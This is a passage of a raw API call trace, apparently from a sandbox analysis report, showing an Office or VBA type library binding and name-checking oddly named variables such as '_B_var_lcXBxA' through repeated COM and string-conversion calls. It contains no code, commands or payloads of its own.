lpWideCharStr="oUAAAxAQ") returned 9 [0069.180] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.180] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oUAAAxAQ", lHashVal=0x10d59c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.180] IUnknown:Release (This=0x665ba50) returned 0xd [0069.180] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.180] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oUAAAxAQ", lHashVal=0x10d59c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.180] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.180] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.180] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oUAAAxAQ", lHashVal=0x10d59c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.180] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.180] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.180] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oUAAAxAQ", lHashVal=0x10d59c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.180] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a629ba, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oUAAAxAQ") returned 9 [0069.180] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oUAAAxAQ", lHashVal=0x10d59c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.180] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.180] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a629ba | out: _Dst=0x67c2d40) returned 0x0 [0069.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oUAAAxAQ") returned 0x10ad25 [0069.180] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_oUAAAxAQ" | out: _Dst="_B_var_oUAAAxAQ") returned 0x0 [0069.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_oUAAAxAQ") returned 16 [0069.180] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.180] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oUAAAxAQ", lHashVal=0x10ad25, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.180] IUnknown:Release (This=0x665ba50) returned 0xd [0069.180] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.180] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oUAAAxAQ", lHashVal=0x10ad25, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.181] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.181] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.181] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oUAAAxAQ", lHashVal=0x10ad25, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.181] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.181] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.181] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oUAAAxAQ", lHashVal=0x10ad25, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.181] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.181] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.181] IUnknown:Release (This=0x665ba50) returned 0xd [0069.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b117be, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_oUAAAxAQ") returned 16 [0069.181] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oUAAAxAQ", lHashVal=0x10ad25, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.181] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a629ba | out: _Dst=0x144ec0) returned 0x0 [0069.181] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lo1A4Q", lHashVal=0x10ee54, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a0e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lo1A4Q") returned 7 [0069.181] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lo1A4Q", lHashVal=0x10ee54, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a0e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lo1A4Q") returned 7 [0069.181] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lo1A4Q", lHashVal=0x10ee54, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lo1A4Q") returned 0x10ee54 [0069.181] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="lo1A4Q" | out: _Dst="lo1A4Q") returned 0x0 [0069.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="lo1A4Q") returned 7 [0069.181] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.181] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lo1A4Q", lHashVal=0x10ee54, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.181] IUnknown:Release (This=0x665ba50) returned 0xd [0069.182] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.182] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lo1A4Q", lHashVal=0x10ee54, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.182] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.182] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.182] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lo1A4Q", lHashVal=0x10ee54, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.182] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.182] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.182] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lo1A4Q", lHashVal=0x10ee54, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.182] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a0e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lo1A4Q") returned 7 [0069.182] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lo1A4Q", lHashVal=0x10ee54, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.182] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.182] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62a0e | out: _Dst=0x67c2d40) returned 0x0 [0069.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lo1A4Q") returned 0x1068be [0069.182] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_lo1A4Q" | out: _Dst="_B_var_lo1A4Q") returned 0x0 [0069.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_lo1A4Q") returned 14 [0069.182] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.182] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lo1A4Q", lHashVal=0x1068be, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.182] IUnknown:Release (This=0x665ba50) returned 0xd [0069.182] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.182] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lo1A4Q", lHashVal=0x1068be, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.182] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.182] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.182] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lo1A4Q", lHashVal=0x1068be, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.182] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.182] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.182] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lo1A4Q", lHashVal=0x1068be, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.182] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.183] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.183] IUnknown:Release (This=0x665ba50) returned 0xd [0069.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b117ee, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_lo1A4Q") returned 14 [0069.183] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lo1A4Q", lHashVal=0x1068be, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0069.183] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62a0e | out: _Dst=0x144ec0) returned 0x0 [0069.183] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lcXBxA", lHashVal=0x103ef8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a629e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lcXBxA") returned 7 [0069.183] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lcXBxA", lHashVal=0x103ef8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a629e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lcXBxA") returned 7 [0069.183] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lcXBxA", lHashVal=0x103ef8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.183] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lcXBxA") returned 0x103ef8 [0069.183] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="lcXBxA" | out: _Dst="lcXBxA") returned 0x0 [0069.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="lcXBxA") returned 7 [0069.183] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.183] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lcXBxA", lHashVal=0x103ef8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.183] IUnknown:Release (This=0x665ba50) returned 0xd [0069.183] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.183] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lcXBxA", lHashVal=0x103ef8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.183] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.183] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.183] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lcXBxA", lHashVal=0x103ef8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.183] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.183] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.183] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lcXBxA", lHashVal=0x103ef8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.184] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a629e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lcXBxA") returned 7 [0069.184] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lcXBxA", lHashVal=0x103ef8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.184] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.184] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a629e6 | out: _Dst=0x67c2d40) returned 0x0 [0069.184] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lcXBxA") returned 0x10b9a1 [0069.184] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_zACZ1w1", cchCount1=-1, lpString2="_B_var_lcXBxA", cchCount2=-1) returned 3 [0069.184] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_lcXBxA" | out: _Dst="_B_var_lcXBxA") returned 0x0 [0069.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_lcXBxA") returned 14 [0069.184] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.184] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lcXBxA", lHashVal=0x10b9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.184] IUnknown:Release (This=0x665ba50) returned 0xd [0069.184] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.184] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lcXBxA", lHashVal=0x10b9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.184] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.184] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.184] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lcXBxA", lHashVal=0x10b9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.184] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.184] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.184] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lcXBxA", lHashVal=0x10b9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.184] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.184] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.184] IUnknown:Release (This=0x665ba50) returned 0xd [0069.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1181e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_lcXBxA") returned 14 [0069.184] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lcXBxA", lHashVal=0x10b9a1, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x78004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x78004200000000, pDummy=0x0) returned 0x0 [0069.184] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a629e6 | out: _Dst=0x144ec0) returned 0x0 [0069.185] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EAGQAUAk", lHashVal=0x10898c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a5e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EAGQAUAk") returned 9 [0069.185] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EAGQAUAk", lHashVal=0x10898c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a5e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EAGQAUAk") returned 9 [0069.185] ITypeComp:RemoteBind (in: This=0x665bd30, szName="EAGQAUAk", lHashVal=0x10898c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.185] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAGQAUAk") returned 0x10898c [0069.185] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="EAGQAUAk" | out: _Dst="EAGQAUAk") returned 0x0 [0069.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="EAGQAUAk") returned 9 [0069.185] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.185] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="EAGQAUAk", lHashVal=0x10898c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.185] IUnknown:Release (This=0x665ba50) returned 0xd [0069.185] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.185] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="EAGQAUAk", lHashVal=0x10898c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.185] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.185] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.185] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="EAGQAUAk", lHashVal=0x10898c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.185] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.185] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.185] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="EAGQAUAk", lHashVal=0x10898c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.185] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a5e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EAGQAUAk") returned 9 [0069.185] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EAGQAUAk", lHashVal=0x10898c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.186] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.186] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62a5e | out: _Dst=0x67c2d40) returned 0x0 [0069.186] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_EAGQAUAk") returned 0x106115 [0069.186] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_EAGQAUAk" | out: _Dst="_B_var_EAGQAUAk") returned 0x0 [0069.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_EAGQAUAk") returned 16 [0069.186] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.186] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_EAGQAUAk", lHashVal=0x106115, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.186] IUnknown:Release (This=0x665ba50) returned 0xd [0069.186] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.186] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_EAGQAUAk", lHashVal=0x106115, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.186] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.186] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.186] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_EAGQAUAk", lHashVal=0x106115, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.186] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.186] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.186] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_EAGQAUAk", lHashVal=0x106115, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.186] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.186] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.186] IUnknown:Release (This=0x665ba50) returned 0xd [0069.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1184e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_EAGQAUAk") returned 16 [0069.186] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EAGQAUAk", lHashVal=0x106115, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0069.186] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62a5e | out: _Dst=0x144ec0) returned 0x0 [0069.186] ITypeComp:RemoteBind (in: This=0x665ba60, szName="dBAAZAx", lHashVal=0x10e742, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: 